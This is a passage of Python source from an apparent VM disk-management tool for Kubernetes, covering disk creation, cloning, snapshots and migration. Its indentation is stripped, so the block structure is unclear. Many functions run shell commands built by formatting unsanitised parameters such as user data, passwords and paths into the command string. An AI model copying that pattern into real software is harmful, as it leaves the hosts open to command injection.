# for line in params.userData:
# data += line.replace(';;;', '\r\n').replace('+', '-')
# logger.debug(data)
# f.write(data)
disk_dir = '%s/%s' % (pool_info['path'], params.vol)
if not os.path.exists(disk_dir):
os.makedirs(disk_dir)
disk_path = '%s/%s' % (disk_dir, params.vol)
op = Operation('cloud-localds %s %s' % (disk_path, params.userData), {})
op.execute()
disk_prepare(poolname, params.vol, disk_path)
write_config(params.vol, disk_dir, disk_path, params.pool, poolname)
result = get_disk_info_to_k8s(poolname, params.vol)
success_print("create CloudInitUserDataImage %s successful." % params.vol, result)
def deleteCloudInitUserDataImage(params):
try:
helper = K8sHelper("VirtualMachineDisk")
disk_info = helper.get_data(params.vol, "volume")
if disk_info is None:
helper.delete(params.vol)
success_print("delete disk %s successful." % params.vol, {})
except ExecuteException as e:
error_print(400, e.message)
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
disk_info = get_vol_info_from_k8s(params.vol)
poolname = disk_info['poolname']
pool_info = get_pool_info(poolname)
disk_dir = '%s/%s' % (pool_info['path'], params.vol)
snapshots_path = '%s/snapshots' % disk_dir
with open('%s/config.json' % disk_dir, "r") as f:
config = load(f)
if os.path.exists(snapshots_path):
for file in os.listdir(snapshots_path):
if '%s/%s' % (snapshots_path, file) == config['current']:
continue
else:
try:
ss_info = get_snapshot_info_from_k8s(file)
except:
continue
raise ExecuteException('', 'error: disk %s still has snapshot %s.' % (params.vol, file))
op = Operation("rm -rf %s" % disk_dir, {})
op.execute()
helper = K8sHelper("VirtualMachineDisk")
helper.delete(params.vol)
success_print("delete CloudInitUserDataImage %s successful." % params.vol, {})
# only can delete disk which not has snapshot.
def deleteDisk(params):
disk_info = get_vol_info_from_k8s(params.vol)
poolname = disk_info['poolname']
pool_info = get_pool_info(poolname)
disk_dir = '%s/%s' % (pool_info['path'], params.vol)
snapshots_path = '%s/snapshots' % disk_dir
with open('%s/config.json' % disk_dir, "r") as f:
config = load(f)
if os.path.exists(snapshots_path):
for file in os.listdir(snapshots_path):
if '%s/%s' % (snapshots_path, file) == config['current']:
continue
else:
try:
ss_info = get_snapshot_info_from_k8s(file)
except:
continue
raise ExecuteException('', 'error: disk %s still has snapshot %s.' % (params.vol, file))
op = Operation("rm -rf %s" % disk_dir, {})
op.execute()
helper = K8sHelper("VirtualMachineDisk")
helper.delete(params.vol)
success_print("delete volume %s success." % params.vol, {})
def resizeDisk(params):
disk_info = get_vol_info_from_k8s(params.vol)
poolname = disk_info['poolname']
disk_dir = '%s/%s' % (get_pool_info(poolname)['path'], params.vol)
with open('%s/config.json' % disk_dir, "r") as f:
config = load(f)
disk_info = get_disk_info(config['current'])
size = int(params.capacity) - int(disk_info['virtual_size'])
op = Operation("qemu-img resize %s +%s" % (config['current'], str(size)), {})
op.execute()
result = get_disk_info_to_k8s(poolname, params.vol)
vol_helper = K8sHelper('VirtualMachineDisk')
vol_helper.create(params.vol, 'volume', result)
success_print("success resize disk %s." % params.vol, result)
def cloneDisk(params):
result = None
disk_heler = K8sHelper('VirtualMachineDisk')
disk_heler.delete_lifecycle(params.vol)
pool_helper = K8sHelper('VirtualMachinePool')
disk_node_name = get_node_name(disk_heler.get(params.vol))
pool_node_name = get_node_name(pool_helper.get(params.pool))
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
poolname = pool_info['poolname']
disk_info = get_vol_info_from_k8s(params.vol)
old_pool_info = get_pool_info_from_k8s(disk_info['pool'])
check_pool_active(old_pool_info)
prepareInfo = disk_prepare(disk_info['poolname'], params.vol, disk_info['uni'])
# create disk dir and create disk in dir.
disk_dir = '%s/%s' % (old_pool_info['path'], params.vol)
uuid = randomUUID().replace('-', '')
middle_disk_dir = '%s/%s' % (old_pool_info['path'], uuid)
middle_disk_path = '%s/%s' % (middle_disk_dir, params.newname)
clone_disk_dir = '%s/%s' % (pool_info['path'], params.newname)
clone_disk_path = '%s/%s' % (clone_disk_dir, params.newname)
if not os.path.exists(middle_disk_dir):
os.makedirs(middle_disk_dir)
with open('%s/config.json' % disk_dir, "r") as f:
config = load(f)
try:
op1 = Operation('cp -f %s %s' % (config['current'], middle_disk_path), {})
op1.execute()
except:
if os.path.exists(middle_disk_dir):
op3 = Operation('rm -rf %s' % middle_disk_dir, {})
op3.execute()
raise ExecuteException('', 'Copy %s to middle_disk_path %s failed!, aborting clone.' % (
config['current'], middle_disk_path))
try:
backing_file = DiskImageHelper.get_backing_file(middle_disk_path)
if backing_file:
op2 = Operation('qemu-img rebase -f %s -b "" %s' % (params.format, middle_disk_path), {})
op2.execute()
except:
if os.path.exists(middle_disk_dir):
op3 = Operation('rm -rf %s' % middle_disk_dir, {})
op3.execute()
raise ExecuteException('', 'Execute "qemu-img rebase %s" failed!, aborting clone.' % middle_disk_path)
# write config
config = {}
config['name'] = params.newname
config['dir'] = clone_disk_dir
config['current'] = clone_disk_path
config['pool'] = params.pool
config['poolname'] = pool_info['poolname']
with open('%s/config.json' % middle_disk_dir, "w") as f:
dump(config, f)
if disk_node_name == pool_node_name:
op = Operation('mv %s %s/%s' % (middle_disk_dir, pool_info['path'], params.newname), {})
op.execute()
jsondicts = get_disk_jsondict(params.pool, params.newname)
create_all_jsondict(jsondicts)
else:
ip = get_node_ip_by_node_name(pool_node_name)
op = Operation('scp -r %s root@%s:%s' % (middle_disk_dir, ip, clone_disk_dir), {})
op.execute()
op = Operation('rm -rf %s' % middle_disk_dir, {})
op.execute()
op = Operation('kubesds-adm registerDiskToK8s --pool %s --vol %s' % (params.pool, params.newname), {},
ip=ip, remote=True, with_result=True)
remote_result = op.execute()
if remote_result['result']['code'] != 0:
raise ExecuteException('RunCmdError', 'remote run cmd kubesds-adm registerDiskToK8s error.')
if result:
helper = K8sHelper("VirtualMachineDisk")
helper.create(params.newname, "volume", result)
success_print("success clone disk %s." % params.vol, result)
else:
success_print("success clone disk %s." % params.vol, {})
def registerDiskToK8s(params):
jsondicts = get_disk_jsondict(params.pool, params.vol)
create_all_jsondict(jsondicts)
success_print("success register disk %s to k8s." % params.vol, {})
# only use when migrate disk to another node
def rebaseDiskSnapshot(params):
rebase_snapshot_with_config(params.pool, params.vol)
disk_info = get_vol_info_from_k8s(params.vol)
disk_prepare(disk_info['poolname'], disk_info['disk'], disk_info['uni'])
success_print("success rebase disk.", {})
def createDiskFromImage(params):
pool_info = get_pool_info_from_k8s(params.targetPool)
check_pool_active(pool_info)
poolname = pool_info['poolname']
dest_dir = '%s/%s' % (pool_info['path'], params.name)
dest = '%s/%s' % (dest_dir, params.name)
dest_config_file = '%s/config.json' % (dest_dir)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir, 0o711)
if os.path.exists(dest_config_file):
raise Exception('Path %s already in use, aborting copy.' % dest_dir)
if params.full_copy:
try:
source_info = get_disk_info(params.source)
if source_info['format'] != 'qcow2':
op = Operation(
'qemu-img convert -f %s %s -O qcow2 %s' % (source_info['format'], params.source, dest), {})
op.execute()
else:
op = Operation('cp -f %s %s' % (params.source, dest), {})
op.execute()
except:
if os.path.exists(dest_dir):
op = Operation('rm -rf %s' % dest_dir, {})
op.execute()
raise Exception('Copy %s to %s failed!' % (params.source, dest))
try:
dest_info = get_disk_info(dest)
if dest_info['format'] == 'qcow2':
op = Operation('qemu-img rebase -f qcow2 %s -b "" -u' % (dest), {})
op.execute()
except:
if os.path.exists(dest_dir):
op = Operation('rm -rf %s' % dest_dir, {})
op.execute()
raise Exception('Execute "qemu-img rebase -f qcow2 %s" failed!' % (dest))
else:
if params.source.find('snapshots') >= 0:
source_disk_dir = os.path.dirname(os.path.dirname(params.source))
else:
source_disk_dir = os.path.dirname(params.source)
config = get_disk_config_by_path('%s/config.json' % source_disk_dir)
disk_info = get_disk_info(config['current'])
op = Operation(
'qemu-img create -f qcow2 -b %s -F %s %s' %
(config['current'], disk_info['format'], dest), {})
op.execute()
write_config(params.name, dest_dir, dest, params.targetPool, poolname)
result = get_disk_info_to_k8s(poolname, params.name)
helper = K8sHelper("VirtualMachineDisk")
helper.update(params.name, "volume", result)
success_print("success createDiskFromImage %s." % params.name, result)
def disk_prepare(pool, vol, uni):
# // prepare
logger.debug(pool)
logger.debug(vol)
logger.debug(uni)
dp = None
try:
vol_info = get_vol_info_from_k8s(vol)
dp = vol_info['pool']
except:
ss_info = get_snapshot_info_from_k8s(vol)
dp = ss_info['pool']
# pool_info = get_pool_info_from_k8s(vol_info['pool'])
# op = Operation('vdisk-prepare ', {'poolname': pool, 'name': vol,
# 'uni': uni}, with_result=True)
auto_mount(dp)
def remote_disk_prepare(ip, pool, vol, uni):
# // remote prepare
op = Operation('kubesds-adm prepareDisk ', {'vol': vol}, remote=True, ip=ip, with_result=True)
cstor = op.execute()
if cstor['result']['code'] != 0:
raise ExecuteException('',
'remote prepare disk fail. cstor raise exception: cstor error code: %d, msg: %s, obj: %s' % (
cstor['result']['code'], cstor['result']['msg'], cstor['obj']))
return cstor
def prepareDisk(params):
if params.domain:
disk_paths = list(get_disks_spec(params.domain).keys())
logger.debug(disk_paths)
for path in disk_paths:
prepare_disk_by_path(path)
if params.vol:
prepare_disk_by_metadataname(params.vol)
if params.path:
prepare_disk_by_path(params.path)
success_print("prepare disk successful.", {})
def releaseDisk(params):
if params.domain:
disk_paths = list(get_disks_spec(params.domain).keys())
logger.debug(disk_paths)
for path in disk_paths:
release_disk_by_path(path)
if params.vol:
release_disk_by_metadataname(params.vol)
if params.path:
release_disk_by_path(params.path)
success_print("success release disk %s." % params.vol, {})
def showDisk(params):
pool_info = get_pool_info_from_k8s(params.pool)
poolname = pool_info['poolname']
result = get_disk_info_to_k8s(poolname, params.vol)
success_print("show disk %s success." % params.pool, result)
def showDiskSnapshot(params):
if params.type == "localfs" or params.type == "nfs" or params.type == "glusterfs" or params.type == "vdiskfs":
ss_info = get_snapshot_info_from_k8s(params.name)
poolname = ss_info['poolname']
disk_config = get_disk_config(poolname, params.vol)
ss_path = '%s/snapshots/%s' % (disk_config['dir'], params.name)
result = get_snapshot_info_to_k8s(poolname, params.vol, params.name)
success_print("success show disk snapshot %s." % params.name, result)
def createExternalSnapshot(params):
disk_info = get_vol_info_from_k8s(params.vol)
poolname = disk_info['poolname']
disk_prepare(poolname, params.vol, disk_info['uni'])
disk_config = get_disk_config(poolname, params.vol)
if params.domain is None:
if check_disk_in_use(disk_config['current']):
raise ExecuteException('', 'disk in using, current file %s is using by another process, '
'is there a vm using the current file, plz check.' % disk_config['current'])
ss_dir = '%s/snapshots' % disk_config['dir']
if not os.path.exists(ss_dir):
os.makedirs(ss_dir)
ss_path = '%s/%s' % (ss_dir, params.name)
op1 = Operation('qemu-img create -f %s -b %s -F %s %s' %
(params.format, disk_config['current'], params.format, ss_path), {})
op1.execute()
with open('%s/config.json' % disk_config['dir'], "r") as f:
config = load(f)
config['current'] = ss_path
with open('%s/config.json' % disk_config['dir'], "w") as f:
dump(config, f)
else:
specs = get_disks_spec(params.domain)
if disk_config['current'] not in list(specs.keys()):
logger.debug('disk %s current is %s.' % (params.vol, disk_config['current']))
raise ExecuteException('', 'domain %s not has disk %s' % (params.domain, params.vol))
vm_disk = specs[disk_config['current']]
ss_path = '%s/snapshots/%s' % (disk_config['dir'], params.name)
ss_dir = '%s/snapshots' % disk_config['dir']
if not os.path.exists(ss_dir):
os.makedirs(ss_dir)
not_need_snapshot_spec = ''
for disk_path in list(specs.keys()):
if disk_path == disk_config['current']:
continue
not_need_snapshot_spec = not_need_snapshot_spec + '--diskspec %s,snapshot=no ' % specs[disk_path]
# '/var/lib/libvirt/pooltest3/wyw123/snapshots/wyw123.6'
# 'vdb,snapshot=no'
op = Operation('virsh snapshot-create-as --domain %s --name %s --atomic --disk-only --no-metadata '
'--diskspec %s,snapshot=external,file=%s,driver=%s %s' %
(params.domain, params.name, vm_disk, ss_path, params.format, not_need_snapshot_spec),
{})
op.execute()
config_path = '%s/config.json' % os.path.dirname(ss_dir)
with open(config_path, "r") as f:
config = load(f)
config['current'] = ss_path
with open(config_path, "w") as f:
dump(config, f)
result = get_snapshot_info_to_k8s(poolname, params.vol, params.name)
# modify disk in k8s
modify_disk_info_in_k8s(poolname, params.vol)
vol_helper = K8sHelper('VirtualMachineDiskSnapshot')
vol_helper.create(params.name, 'volume', result)
success_print("success create disk external snapshot %s" % params.name, result)
# create snapshot on params.name, then rename snapshot to current
def revertExternalSnapshot(params):
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
poolname = pool_info['poolname']
helper = K8sHelper("VirtualMachineDiskSnapshot")
k8s_ss_info = helper.get_data(params.name, "volume")
backing_file = k8s_ss_info['full_backing_filename']
disk_prepare(poolname, params.vol, pool_info['url'])
if params.domain and is_vm_active(params.domain):
raise ExecuteException('', 'domain %s is still active, plz stop it first.')
disk_config = get_disk_config(poolname, params.vol)
if check_disk_in_use(disk_config['current']):
raise ExecuteException('', 'error: current disk in use, plz check or set real domain field.')
ss_path = '%s/snapshots/%s' % (disk_config['dir'], params.name)
if ss_path is None:
raise ExecuteException('', 'error: can not get snapshot backing file.')
uuid = randomUUID().replace('-', '')
new_file_path = '%s/%s' % (os.path.dirname(backing_file), uuid)
op1 = Operation('qemu-img create -f %s -b %s -F %s %s' %
(params.format, backing_file, params.format, new_file_path), {})
op1.execute()
# change vm disk
if params.domain and not change_vm_os_disk_file(params.domain, disk_config['current'], new_file_path):
op2 = Operation('rm -f %s' % new_file_path, {})
op2.execute()
raise ExecuteException('', 'can not change disk source in domain xml')
# modify json file, make os_event_handler to modify data on api server .
with open('%s/config.json' % disk_config['dir'], "r") as f:
config = load(f)
config['current'] = new_file_path
with open('%s/config.json' % disk_config['dir'], "w") as f:
dump(config, f)
# modify disk in k8s
modify_disk_info_in_k8s(poolname, params.vol)
# delete lifecycle
helper.delete_lifecycle(params.name)
success_print("success revert disk external snapshot %s." % params.name, {})
def deleteExternalSnapshot(params):
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
poolname = pool_info['poolname']
helper = K8sHelper("VirtualMachineDiskSnapshot")
k8s_ss_info = helper.get_data(params.name, "volume")
backing_file = k8s_ss_info['full_backing_filename']
# prepare base
disk_prepare(poolname, params.vol, pool_info['url'])
if params.domain:
specs = get_disks_spec(params.domain)
disk_config = get_disk_config(poolname, params.vol)
if disk_config['current'] not in list(specs.keys()):
raise ExecuteException('', 'domain %s not has disk %s' % (params.domain, params.vol))
disk_config = get_disk_config(poolname, params.vol)
# get all snapshot to delete(if the snapshot backing file chain contains backing_file), except current.
snapshots_to_delete = []
files = os.listdir('%s/snapshots' % disk_config['dir'])
for df in files:
try:
bf_paths = get_sn_chain_path('%s/snapshots/%s' % (disk_config['dir'], df))
if backing_file in bf_paths:
snapshots_to_delete.append(df)
except:
continue
# if snapshot to delete is current, delete vmsn from server.
if params.name not in snapshots_to_delete:
snapshots_to_delete.append(params.name)
if backing_file in get_sn_chain_path(disk_config['current']):
if params.domain and is_vm_active(params.domain):
current_backing_file = DiskImageHelper.get_backing_file(disk_config['current'])
# reconnect the snapshot chain
bf_bf_path = DiskImageHelper.get_backing_file(backing_file)
if bf_bf_path:
op = Operation('virsh blockpull --domain %s --path %s --base %s --wait' %
(params.domain, disk_config['current'], backing_file), {})
op.execute()
else:
op = Operation('virsh blockpull --domain %s --path %s --wait' %
(params.domain, disk_config['current']), {})
op.execute()
op = Operation('rm -f %s' % backing_file, {})
op.execute()
# # if the snapshot to delete is not current, delete snapshot's backing file
# if current_backing_file != backing_file:
# op = Operation('rm -f %s' % backing_file, {})
# op.execute()
else:
current_backing_file = DiskImageHelper.get_backing_file(disk_config['current'])
# reconnect the snapshot chain
paths = get_sn_chain_path(disk_config['current'])
if backing_file in paths:
bf_bf_path = DiskImageHelper.get_backing_file(backing_file)
if bf_bf_path:
# effect current and backing file is not head, rabse current to reconnect
op = Operation('qemu-img rebase -b %s %s' % (bf_bf_path, disk_config['current']), {})
op.execute()
else:
# effect current and backing file is head, rabse current to itself
op = Operation('qemu-img rebase -b "" %s' % disk_config['current'], {})
op.execute()
op = Operation('rm -f %s' % backing_file, {})
op.execute()
# # if the snapshot to delete is not current, delete snapshot's backing file
# if current_backing_file != backing_file:
# op = Operation('rm -f %s' % backing_file, {})
# op.execute()
for df in snapshots_to_delete:
if df != os.path.basename(disk_config['current']):
op = Operation('rm -f %s/snapshots/%s' % (disk_config['dir'], df), {})
op.execute()
# modify json file, make os_event_handler to modify data on api server .
with open('%s/config.json' % disk_config['dir'], "r") as f:
config = load(f)
config['current'] = config['current']
with open('%s/config.json' % disk_config['dir'], "w") as f:
dump(config, f)
# delete snapshot in k8s
for ss in snapshots_to_delete:
helper.delete(ss)
# modify disk current info in k8s
modify_disk_info_in_k8s(poolname, params.vol)
# result = {'delete_ss': snapshots_to_delete, 'disk': disk_config['name'],
# 'need_to_modify': config['current'], "pool": params.pool, "poolname": poolname}
success_print("success delete disk external snapshot %s." % params.name, {})
def updateDiskCurrent(params):
for current in params.current:
if params.current.find("snapshots") > 0:
config_path = '%s/config.json' % os.path.dirname(os.path.dirname(current))
else:
config_path = '%s/config.json' % os.path.dirname(current)
with open(config_path, "r") as f:
config = load(f)
config['current'] = current
with open(config_path, "w") as f:
dump(config, f)
success_print("updateDiskCurrent successful.", {})
def customize(params):
if params.user and params.password:
op = Operation('virt-customize --add %s --password %s:password:%s' % (params.add, params.user, params.password),
{})
op.execute()
elif params.ssh_inject:
cmd = 'virt-customize --add %s --ssh-inject \"%s\"' % (params.add, params.ssh_inject)
# print cmd
op = Operation(cmd, {})
op.execute()
else:
raise ExecuteException('', 'plz give right args and value.')
success_print("customize successful.", {})
def migrate(params):
if not is_vm_disk_driver_cache_none(params.domain):
raise ExecuteException('', 'error: disk driver cache is not none')
# if not is_vm_disk_not_shared_storage(params.domain):
# raise ExecuteException('', 'error: still has disk not create in shared storage.')
if params.ip in get_host_IP():
raise ExecuteException('', 'error: not valid ip address.')
# prepare all disk
specs = get_disks_spec(params.domain)
for disk_path in list(specs.keys()):
remote_prepare_disk_by_path(params.ip, disk_path)
if params.offline:
op = Operation('virsh migrate --offline --undefinesource --persistent %s qemu+ssh://%s/system tcp://%s' % (
params.domain, params.ip, params.ip), {})
op.execute()
else:
op = Operation('virsh migrate --live --undefinesource --persistent %s qemu+ssh://%s/system tcp://%s' % (
params.domain, params.ip, params.ip), {})
op.execute()
# get disk node label in ip
node_name = get_node_name_by_node_ip(params.ip)
logger.debug("node_name: %s" % node_name)
if node_name:
all_jsondicts = []
logger.debug(specs)
for disk_path in list(specs.keys()):
prepare_info = get_disk_prepare_info_by_path(disk_path)
pool_info = get_pool_info_from_k8s(prepare_info['pool'])
# check_pool_active(pool_info)
pools = get_pools_by_path(pool_info['path'])
# change disk node label in k8s.
targetPool = None
for pool in pools:
if pool['host'] == node_name:
targetPool = pool['pool']
remote_start_pool(params.ip, targetPool)
if targetPool:
logger.debug("targetPool is %s." % targetPool)
if pool_info['pooltype'] in ['localfs', 'nfs', 'glusterfs']:
config = get_disk_config(pool_info['poolname'], prepare_info['disk'])
write_config(config['name'], config['dir'], config['current'], targetPool, config['poolname'])
jsondicts = get_disk_jsondict(targetPool, prepare_info['disk'])
all_jsondicts.extend(jsondicts)
else:
jsondicts = get_disk_jsondict(targetPool, prepare_info['disk'])
all_jsondicts.extend(jsondicts)
apply_all_jsondict(all_jsondicts)
success_print("migrate vm %s successful." % params.domain, {})
def changeDiskPool(params):
if not os.path.exists(params.xml):
raise ExecuteException('RunCmdError', 'can not find vm xml file: %s.' % params.xml)
# get disk node label in ip
node_name = get_hostname_in_lower_case()
# node_name = get_node_name_by_node_ip(params.ip)
logger.debug("node_name: %s" % node_name)
specs = get_disks_spec_by_xml(params.xml)
all_jsondicts = []
logger.debug(specs)
for disk_path in list(specs.keys()):
prepare_info = get_disk_prepare_info_by_path(disk_path)
pool_info = get_pool_info_from_k8s(prepare_info['pool'])
# check_pool_active(pool_info)
pools = get_pools_by_path(pool_info['path'])
logger.debug("pools: %s" % dumps(pools))
logger.debug("node_name: %s" % node_name)
# change disk node label in k8s.
targetPool = None
for pool in pools:
if pool['host'] == node_name:
targetPool = pool['pool']
if targetPool:
logger.debug("targetPool is %s." % targetPool)
pool_active(pool_info['pool'])
if pool_info['pooltype'] in ['localfs', 'nfs', 'glusterfs', 'vdiskfs']:
# if pool_info['pooltype'] == 'vdiskfs':
# pool_active(pool_info['pool'])
config = get_disk_config(pool_info['poolname'], prepare_info['disk'])
write_config(config['name'], config['dir'], config['current'], targetPool, config['poolname'])
jsondicts = get_disk_jsondict(targetPool, prepare_info['disk'])
all_jsondicts.extend(jsondicts)
else:
jsondicts = get_disk_jsondict(targetPool, prepare_info['disk'])
all_jsondicts.extend(jsondicts)
else:
raise ExecuteException('RunCmdError',
'can not find pool %s on node %s.' % (pool_info['poolname'], node_name))
apply_all_jsondict(all_jsondicts)
success_print("register vm disk %s successful.", {})
def migrateDiskFunc(sourceVol, targetPool):
disk_info = get_vol_info_from_k8s(sourceVol)
# prepare disk
prepareInfo = disk_prepare(disk_info['poolname'], sourceVol, disk_info['uni'])
source_pool_info = get_pool_info_from_k8s(disk_info['pool'])
pool_info = get_pool_info_from_k8s(targetPool)
logger.debug(disk_info)
logger.debug(pool_info)
if source_pool_info['poolname'] != pool_info['poolname']:
check_pool_active(source_pool_info)
disk_heler = K8sHelper('VirtualMachineDisk')
disk_heler.delete_lifecycle(sourceVol)
pool_helper = K8sHelper('VirtualMachinePool')
pool_node_name = get_node_name(pool_helper.get(targetPool))
disk_node_name = get_node_name(disk_heler.get(sourceVol))
if disk_node_name != pool_node_name:
ip = get_node_ip_by_node_name(pool_node_name)
remote_start_pool(ip, targetPool)
# same pool ignore
if disk_info['pool'] == pool_info['pool']:
logger.debug('disk %s has been in pool %s' % (sourceVol, targetPool))
return
logger.debug(pool_info['pooltype'])
if pool_info['pooltype'] in ['localfs', 'nfs', 'glusterfs', "vdiskfs"]:
if source_pool_info['pooltype'] in ['localfs', 'nfs', 'glusterfs', "vdiskfs"]: # file to file
source_dir = '%s/%s' % (get_pool_info(disk_info['poolname'])['path'], sourceVol)
if pool_node_name == disk_node_name:
if disk_info['poolname'] != pool_info['poolname']:
# cp and rebase backing file and config, then update k8s
op = Operation('cp -rf %s %s/' % (source_dir, pool_info['path']), {})
op.execute()
rebase_snapshot_with_config(targetPool, sourceVol)
disk_info = get_vol_info_from_k8s(sourceVol)
disk_prepare(pool_info['poolname'], sourceVol, disk_info['uni'])
op = Operation('rm -rf %s' % source_dir, {})
op.execute()
else:
if pool_info['pooltype'] in ['nfs', 'glusterfs', 'vdiskfs'] and disk_info['poolname'] == pool_info['poolname']:
# just change pool, label and nodename
if pool_info['pooltype'] == 'vdiskfs':
try:
ip = get_node_ip_by_node_name(pool_node_name)
remote_start_pool(ip, targetPool)
except:
pass
else:
config = get_disk_config(pool_info['poolname'], sourceVol)
write_config(sourceVol, config['dir'], config['current'], targetPool, pool_info['poolname'])
ip = get_node_ip_by_node_name(pool_node_name)
disk_info = get_vol_info_from_k8s(sourceVol)
remote_disk_prepare(ip, pool_info['poolname'], sourceVol, disk_info['uni'])
jsondicts = get_disk_jsondict(targetPool, sourceVol)
apply_all_jsondict(jsondicts)
else:
# scp
ip = get_node_ip_by_node_name(pool_node_name)
op = Operation('scp -r %s root@%s:%s/' % (source_dir, ip, pool_info['path']), {})
op.execute()
op = Operation('kubesds-adm rebaseDiskSnapshot --pool %s --vol %s' % (targetPool, sourceVol), {},
ip=ip, remote=True, with_result=True)
remote_result = op.execute()
if remote_result['result']['code'] != 0:
raise ExecuteException('RunCmdError', 'remote run cmd kubesds-adm rebaseDiskSnapshot error.')
op = Operation('rm -rf %s' % source_dir, {})
op.execute()
else: # dev to file
disk_prepare(disk_info['poolname'], sourceVol, disk_info['uni'])
this_node_name = get_hostname_in_lower_case()
logger.debug('this_node_name: %s' % this_node_name)
if pool_node_name == this_node_name: # in same node, create file then convert.
target_disk_dir = '%s/%s' % (pool_info['path'], sourceVol)
if not os.path.exists(target_disk_dir):
os.makedirs(target_disk_dir)
target_disk_file = '%s/%s' % (target_disk_dir, sourceVol)
op = Operation(
'qemu-img convert -f raw %s -O qcow2 %s' % (prepareInfo['data']['path'], target_disk_file), {})
op.execute()
write_config(sourceVol, target_disk_dir, target_disk_file, targetPool, pool_info['poolname'])
result = get_disk_info_to_k8s(pool_info['poolname'], sourceVol)
disk_heler.update(sourceVol, 'volume', result)
else:
# remote prepare disk, then migrate disk in remote node
pools = get_pools_by_poolname(pool_info['poolname'])
# change disk node label in k8s.
remote_dev_pool = None
for pool in pools:
if pool['host'] == pool_node_name:
remote_dev_pool = pool['pool']
if remote_dev_pool:
ip = get_node_ip_by_node_name(pool_node_name)
remote_disk_prepare(ip, disk_info['poolname'], sourceVol, disk_info['uni'])
op = Operation('kubesds-adm migrateDisk --pool %s --vol %s' % (remote_dev_pool, sourceVol), {},
ip=ip, remote=True, with_result=True)
result = op.execute()
if result['result']['code'] != 0:
raise ExecuteException('RunCmdError', 'can not migrate disk on remote node.')
else:
if source_pool_info['pooltype'] in ['localfs', 'nfs', 'glusterfs', "vdiskfs"]: # file to dev
raise ExecuteException('RumCmdError', 'not support storage type, can not migrate file to dev.')
# # create disk
# newCreateInfo = cstor_create_disk(pool_info['poolname'], params.vol, disk_info['virtual_size'])
# uni = newCreateInfo["data"]["uni"]
# op = Operation('qemu-img convert -f %s %s -O raw %s' % (disk_info['format'], disk_info['filename'], prepareInfo['data']['path']),
# {})
# op.execute()
# if pool_node_name != disk_node_name:
# cstor_release_disk(pool_info['poolname'], params.vol, uni)
# ip = get_node_ip_by_node_name(pool_node_name)
# remotePrepareInfo = remote_cstor_disk_prepare(ip, pool_info['poolname'], params.vol, uni)
# # register to k8s
# result = {
# "disk": params.vol,
# "pool": params.pool,
# "poolname": pool_info['poolname'],
# "uni": newCreateInfo["data"]["uni"],
# "current": remotePrepareInfo["data"]["path"],
# "virtual_size": remotePrepareInfo["data"]["size"],
# "filename": remotePrepareInfo["data"]["path"]
# }
# disk_heler.change_node(params.vol, pool_node_name)
# else:
# # register to k8s
# result = {
# "disk": params.vol,
# "pool": params.pool,
# "poolname": pool_info['poolname'],
# "uni": newCreateInfo["data"]["uni"],
# "current": prepareInfo["data"]["path"],
# "virtual_size": prepareInfo["data"]["size"],
# "filename": prepareInfo["data"]["path"]
# }
# disk_heler.update(params.vol, 'volume', result)
# # release old disk
# cstor_release_disk(disk_info['poolname'], params.vol, disk_info['uni'])
# cstor_delete_disk(disk_info['poolname'], params.vol)
# # delete disk
# op = Operation('rm -rf %s/%s' % (source_pool_info['path'], params.vol))
# op.execute()
else: # dev to dev
# same poolname, just prepare and release
if disk_info['poolname'] == pool_info['poolname']:
if pool_node_name == disk_node_name:
raise ExecuteException('RunCmdError', 'can not migrate disk to its pool.')
else:
# remote prepare disk
ip = get_node_ip_by_node_name(pool_node_name)
prepareInfo = remote_disk_prepare(ip, disk_info['poolname'], sourceVol, disk_info['uni'])
# release old disk
result = {
"disk": sourceVol,
"pool": targetPool,
"poolname": pool_info['poolname'],
"uni": prepareInfo["data"]["uni"],
"current": prepareInfo["data"]["path"],
"virtual_size": disk_info['virtual_size'],
"filename": prepareInfo["data"]["path"]
}
disk_heler.update(sourceVol, 'volume', result)
disk_heler.change_node(sourceVol, pool_node_name)
else:
raise ExecuteException('RunCmdError',
'can not migrate disk to this pool. Not support operation.')
# source_pool_info = get_pool_info_from_k8s(disk_info['pool'])
# if pool_info['path'] == source_pool_info['path']:
# raise ExecuteException('RunCmdError',
# 'can not migrate disk to this pool. Because their uni is equal.')
# # raise ExecuteException('RunCmdError', 'can not migrate disk to this pool. Because their poolname is not equal.')
# # prepare disk
# prepareInfo = cstor_disk_prepare(disk_info['poolname'], params.vol, disk_info['uni'])
# ifFile = prepareInfo["data"]["path"]
# # create same disk in target pool
# newCreateInfo = cstor_create_disk(pool_info['poolname'], params.vol, disk_info['virtual_size'])
# uni = newCreateInfo["data"]["uni"]
# # dd
# op = Operation('dd if=%s of=%s' % (ifFile, ofFile), {})
# op.execute()
# if pool_node_name != disk_node_name:
# cstor_release_disk(pool_info['poolname'], params.vol, uni)
# ip = get_node_ip_by_node_name(pool_node_name)
# remotePrepareInfo = remote_cstor_disk_prepare(ip, pool_info['poolname'], params.vol, uni)
# # register to k8s
# result = {
# "disk": params.vol,
# "pool": params.pool,
# "poolname": pool_info['poolname'],
# "uni": newCreateInfo["data"]["uni"],
# "current": remotePrepareInfo["data"]["path"],
# "virtual_size": remotePrepareInfo["data"]["size"],
# "filename": remotePrepareInfo["data"]["path"]
# }
# disk_heler.change_node(params.vol, pool_node_name)
# else:
# # register to k8s
# result = {
# "disk": params.vol,
# "pool": params.pool,
# "poolname": pool_info['poolname'],
# "uni": newCreateInfo["data"]["uni"],
# "current": newPrepareInfo["data"]["path"],
# "virtual_size": newPrepareInfo["data"]["size"],
# "filename": newPrepareInfo["data"]["path"]
# }
# disk_heler.update(params.vol, 'volume', result)
# # release old disk
# cstor_release_disk(disk_info['poolname'], params.vol, disk_info['uni'])
# cstro_delete_disk(disk_info['poolname'], params.vol)
def migrateDisk(params):
disk_heler = K8sHelper('VirtualMachineDisk')
disk_heler.delete_lifecycle(params.vol)
migrateDiskFunc(params.vol, params.pool)
success_print("success migrate disk.", {})
def modifyVM(params):
modifyVMOnNode(params.domain)
success_print("success modifyVM.", {})
# cold migrate
def migrateVMDisk(params):
if is_vm_active(params.domain):
raise ExecuteException('', 'error: vm is still running, plz stop it firstly.')
if not is_vm_disk_driver_cache_none(params.domain):
raise ExecuteException('', 'error: disk driver cache is not none')
# if not is_vm_disk_not_shared_storage(params.domain):
# raise ExecuteException('', 'error: still has disk not create in shared storage.')
